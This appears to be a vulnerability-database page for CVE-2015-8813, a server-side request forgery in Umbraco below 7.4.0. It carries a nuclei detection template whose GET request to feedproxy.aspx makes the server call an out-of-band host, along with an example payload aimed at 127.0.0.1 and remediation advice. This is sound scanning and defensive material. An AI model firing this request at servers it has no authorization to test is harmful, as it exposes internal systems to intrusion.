Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Umbraco <7.4.0- Server-Side Request Forgery

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 87 Views

Umbraco <7.4.0- Server-Side Request Forgery. Vulnerability in feedproxy.aspx allows unauthorized HTTP GET requests, potentially leading to data breaches

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD		Umbraco CMS Security Bypass Vulnerability
24 Feb 201600:00
cnvd
CVE		CVE-2015-8813
3 Mar 201716:00
cve
Cvelist		CVE-2015-8813
3 Mar 201716:00
cvelist
Github Security Blog		Umbraco CMS vulnerable to CSRF
17 May 202202:56
github
NVD		CVE-2015-8813
3 Mar 201716:59
nvd
OSV		GHSA-X34J-WXQ8-7VCM Umbraco CMS vulnerable to CSRF
17 May 202202:56
osv
Prion		Server side request forgery (ssrf)
3 Mar 201716:59
prion
VulnCheck KEV		VulnCheck KEV: CVE-2015-8813
19 Sep 202400:00
vulncheck_kev
id: CVE-2015-8813

info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.11595
    epss-percentile: 0.95491
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a004730450221009a6f911329aa4e236e194bfc88e244f43f5853dd887bb3f7a6d4c811b59633b5022025cec2e7db323435ffaa9739c19da5d75799631be1c25c2430e93d5316a8fc39:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.3
CVSS 38.2
EPSS0.11595
umbracocve-2015-8813server-side request forgeryopen-sourceasp.net cms
87